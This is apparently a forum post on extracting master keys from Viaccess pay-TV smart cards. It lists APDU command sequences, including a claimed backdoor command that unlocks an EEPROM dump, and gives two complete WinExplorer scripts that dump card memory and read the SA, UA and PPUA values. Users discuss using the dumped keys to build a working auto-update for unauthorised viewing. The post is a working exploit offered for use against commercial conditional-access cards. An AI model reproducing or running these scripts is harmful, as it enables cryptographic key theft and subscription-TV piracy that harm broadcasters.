How to read out MKs from original card

[admin]

Thanks to mrtoolate and others

extracting Keys from Viaccess cards
i will start with Basic commands

CA A4 00 00 00
Change to DF Dedicated File also called Master File or ISSUER.
the card will Replay:
90 00 : OK

CA A4 02 00 00
Change to next EF (Elementary Files) or supported Provider.
the card will Replay:
90 00 : OK
90 08 : nok no more

CA B0 00 00 xx
to read from Memory the result of last command. (Memory reading)
the card will Replay xx bytes

CA 88 00 0x yy
send ECM to card to be decrypted with (x)key. (yy) lenth of data
follow, the card send 88 then Receiver send the yy data
if the signature ok the card Replay 90 00 if not 90 08

CA AC A1 00 00
all the time return AC 90 00 and if you read the Memory you will get the ISSUER Ident (FF F4 00).

now how can we dump the epprom from Viaccess cards?

1-CA A4 00 00 00 :change to main file
:receive 90 00

2-CA A4 02 00 00 :Change to next EF
:receive 90 00

3-CA AC A1 00 00 :the ISSUER Ident
:receive AC 90 00

4-CA 88 00 08 44 :send ECM header key 8 with 68 bytes data lenth
:receive 88

5-40 92 00 00..00 :send 68 bytes data start with 40 92 and 66 bytes of
:zeros.
:receive 90 04

6-BC 52 00 00 00 :this command is bug in the V1 card system or secret
:command or to open Backdoor .
:receive 6B 00 "command not supported"

at this point the card ready to read the eeprom -
you can read about 7k byte by sending next command 27 times each time
you read FF (255 byte). 27 * 255=6885 bytes

7-CA B8 00 00 FF :Memory reading

you find all MKs in Memory dump of the card after 26 and provider id
and mk index for example:

26 FF F4 00 04 xx xx xx xx xx xx xx xx : MK04 for ISSUER
26 00 E4 00 01 xx xx xx xx xx xx xx xx : MK01 for SCT

-----------------------------------------------
Next the script for WinExplorer v4.6
-----------------------------------------------
dim i
sub main()
sc.write("ca a4 00 00 00")
sc.read(2)
sc.write("ca a4 02 00 00")
sc.read(2)
sc.write("ca ac a1 00 00")
sc.read(3)
sc.write("ca 88 00 08 44")
sc.read(1)
sc.write("40 92 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00")
sc.read(2)
sc.write("bc 52 00 00 00")
sc.read(2)

for i= 1 to 27
sc.write("ca b8 00 00 ff")
sc.read(1)
sc.read(255)
sc.read(2)
next

End Sub
-----------------------------------------------
End of script
-----------------------------------------------

I think new Viaccess2 cards same old ones
with small modifcations one of them they fix the (BC 52 00 00 00) command we need to find new backdoor command.

Q - 90 08 : nok no more -means card is dead
A - no the card can support more than one provider so
every provider have file in the card, at startup the receive change from one file to next one and read the data for that provider at the end of the card files when the receive try to see next provider the card send 90 08 means no more providers then the reciver go back to main file CA A4 00 00

so the reciver store all providers Ident and ppua in memory to filter ECMs and EMMs for supported providers.
Card dead is 90 01.

Which is kind of stupid cause if the card is dead there are great chances that it can't answer to anything and obviously not send this status word

Q - But how do you extract the PPUA.
A - 'extract the PPUA'

extract is wrong word , read PPUA is right one...


ca ac a5 00 00 for normal mode
ca ac a5 8i 00 for Hashed Mode
ca ac a5 4i 00 for SuperEncryption mode

i = key 0..7 to calc hash or to crypt data

after ca ac...
if 90 00 answer you can get the data with
ca b8 00 00 Len


Normal Mode:

-> CA AC A5 00 00 [AC] (90 00)
-> CA B8 00 00 XX [B8] A5 04 C2 03 XX XX (90 08 ) <-- PPUA


SuperEncryption mode:

-> CA AC A5 45 00 [AC] (90 00)
-> CA B8 00 00 02 [B8] 92 08 (90 00)
-> CA B8 00 00 08 [B8] 6A 85 03 E8 74 E3 A3 97 (90 00)
-> CA B8 00 00 02 [B8] 81 02 (90 00)
-> CA B8 00 00 02 [B8] 60 DA (90 00)
-> Plain Data : [AE 00]
-> CA B8 00 00 02 [B8] 81 06 (90 00)
-> CA B8 00 00 06 [B8] 8D 1B 4D 93 17 3D (90 08 ) <-- PPUA Crypted data
-> Plain Data : [A5 04 C2 03 XX XX] <-- PPUA Crypted Calculated to plain

Hashed Mode:

-> CA AC A5 81 00 [AC] (90 00)
-> CA B8 00 00 02 [B8] AE 00 (90 00)
-> CA B8 00 00 02 [B8] A5 04 (90 00)
-> CA B8 00 00 04 [B8] C2 03 XX XX(90 00) <-- PPUA
-> CA B8 00 00 02 [B8] F0 08 (90 00)
-> CA B8 00 00 08 [B8] B3 51 87 81 44 FE 03 82 (90 08 )

this 3 methods can be used for all Records of Consultation.

Q - I was really looking for a way to read the SA and CustomWP, in order to make a working AU.
A - I actually used som logic. The order of the dump begins with the ISSUER "ex. viasat FF F4 00" and the followed by viasat nordic 01 0C 00 and then came the MK's after #26 (as stated in original post).

I looked for the first #26 and it had the ISSUER followed by xx xx xx xx xx FF,

Ex. SENDA

26 FF F5 10 xx xx xx xx FF

I have 3 original SENDA cards and two of them uses the same serial except for tha last 2 digits. The third serial is way of.

The two senda cards with almost the same serialnr had (in the dump) :

26 FF F5 10 XX XX XX 08 08 FF

26 FF F5 10 XX XX XX 06 06 FF

The difference being 06 and the 08, so I tried using the xx xx xx as a SA and the first 06/08 as a customwp.

It worked.

Much more fun than using MKextract

think i tried it on via some time ago and it worked.
It would read sa,ua.
Sub Main()
verbose=false
sc.print(vbcr & "This script will check what SA/UA there is on a card!" & vbcr & vbcr)
sc.write("CA A4 04 00 03")
sc.read(1)
ppid = sc.inputbox("Input what PPID you want to check SA/UA to","Input PPID","000000")
sc.print("PPID: " & ppid & vbcr)
sc.write(ppid)
sc.read(2)
if sc.getbyte(1)=8 then
sc.print("not supported PPID!")
sc.msgbox("This PPID is not supported by the card!")
exit sub
end if
sc.write("CA AC A5 00 00")
sc.read(1)
do while sc.getbyte(0) <> 144 'until 90 is received
sc.read(1)
loop
sc.read(1)
sc.write("CA B8 00 00 06")
sc.read(1)
sc.read(2)
sc.read(4)
sa=(hex2(sc.getbyte(0)) & hex2(sc.getbyte(1)) & hex2(sc.getbyte(2)) & hex2(sc.getbyte(3)))
sc.print( vbcr & "SA IS: " & sa)
sc.read(2)
sc.write("CA AC A4 00 00")
sc.read(1)
do while sc.getbyte(0) <> 144 'until 90 is received
sc.read(1)
loop
sc.read(1)
sc.write("CA B8 00 00 07")
sc.read(1)
sc.read(2)
sc.read(5)
ua=(hex2(sc.getbyte(0)) & hex2(sc.getbyte(1)) & hex2(sc.getbyte(2)) & hex2(sc.getbyte(3)) & hex2(sc.getbyte(4)))
sc.print( vbcr & "UA IS: " & ua)
sc.read(2)
End Sub

function hex2(i)
s=hex(i)
if len(s)=1 then
s="0" & s
end if
hex2=s
end function